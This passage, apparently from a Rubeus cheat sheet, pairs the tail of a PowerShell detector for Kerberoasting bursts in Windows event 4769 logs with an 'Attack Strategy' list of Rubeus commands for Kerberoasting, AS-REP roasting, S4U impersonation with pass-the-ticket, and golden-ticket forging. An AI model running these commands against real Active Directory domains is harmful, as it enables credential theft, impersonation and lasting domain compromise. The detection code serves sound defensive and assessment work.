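            $window = @($sorted | Where-Object { $_.Time -ge $start -and $_.Time -le $start.AddMinutes($WindowMinutes) })
            $services = @($window.Service | Sort-Object -Unique)
            if ($services.Count -ge $MinDistinctServices) {
                [pscustomobject]@{
                    User             = $g.Name
                    SourceIp         = (@($window.Ip | Sort-Object -Unique) -join ',')
                    DistinctServices = $services.Count
                    Services         = ($services -join ',')
                    WindowStart      = $start
                    WindowEnd        = $window[-1].Time
                }
                break   # one alert per user is enough
            }
        }
    }
}

# Constructed sample: jdoe requests RC4 tickets for six service accounts within 75 seconds,
# asmith makes one ordinary AES request to a file server.
$template = '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>4769</EventID>' +
            '<TimeCreated SystemTime="{0}"/></System><EventData><Data Name="TargetUserName">{1}@DOMAIN.COM</Data>' +
            '<Data Name="ServiceName">{2}</Data><Data Name="TicketEncryptionType">{3}</Data>' +
            '<Data Name="IpAddress">::ffff:{4}</Data></EventData></Event>'
$base = [datetime]::SpecifyKind([datetime]'2024-05-01T09:00:00', 'Utc')
$fmt  = "yyyy-MM-dd'T'HH:mm:ss.fffffff'Z'"
$i = 0
$sampleXml = foreach ($svc in 'sqlsvc','websvc','backupsvc','reportsvc','ftpsvc','mqsvc') {
    $template -f $base.AddSeconds(15 * $i++).ToString($fmt), 'jdoe', $svc, '0x17', '10.0.0.25'
}
$sampleXml += $template -f $base.AddMinutes(1).ToString($fmt), 'asmith', 'FILESRV01$', '0x12', '10.0.0.40'

$events = $sampleXml | ConvertFrom-Event4769
Find-KerberoastBurst -Events $events | Format-List
```

In production replace the sample with `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | ForEach-Object { $_.ToXml() } | ConvertFrom-Event4769` on the DC. A /rc4opsec or /aes run sidesteps the etype filter, which is why -AnyEType exists; what it cannot hide is the burst of distinct service accounts from one principal, so tune the window and threshold against your own baseline rather than the encryption type.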

Attack Strategy

# Start with reconnaissance of what is already in memory
Rubeus.exe triage
Rubeus.exe klist

# Identify targets without requesting tickets yet (/stats only enumerates and prints statistics)
Rubeus.exe kerberoast /stats
Rubeus.exe asreproast /nowrap

# Execute targeted attacks
Rubeus.exe kerberoast /user:specific_target /nowrap
Rubeus.exe s4u /user:service /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.domain.com /ptt

# Persistence, only with explicit scope approval: a golden ticket survives password resets until krbtgt is rotated twice
Rubeus.exe golden /rc4:krbtgt_hash /user:admin /domain:domain.com /sid:S-1-5-21-...


This cheat sheet provides a comprehensive reference for using Rubeus. Always ensure you have proper authorization before conducting Active Directory security assessments.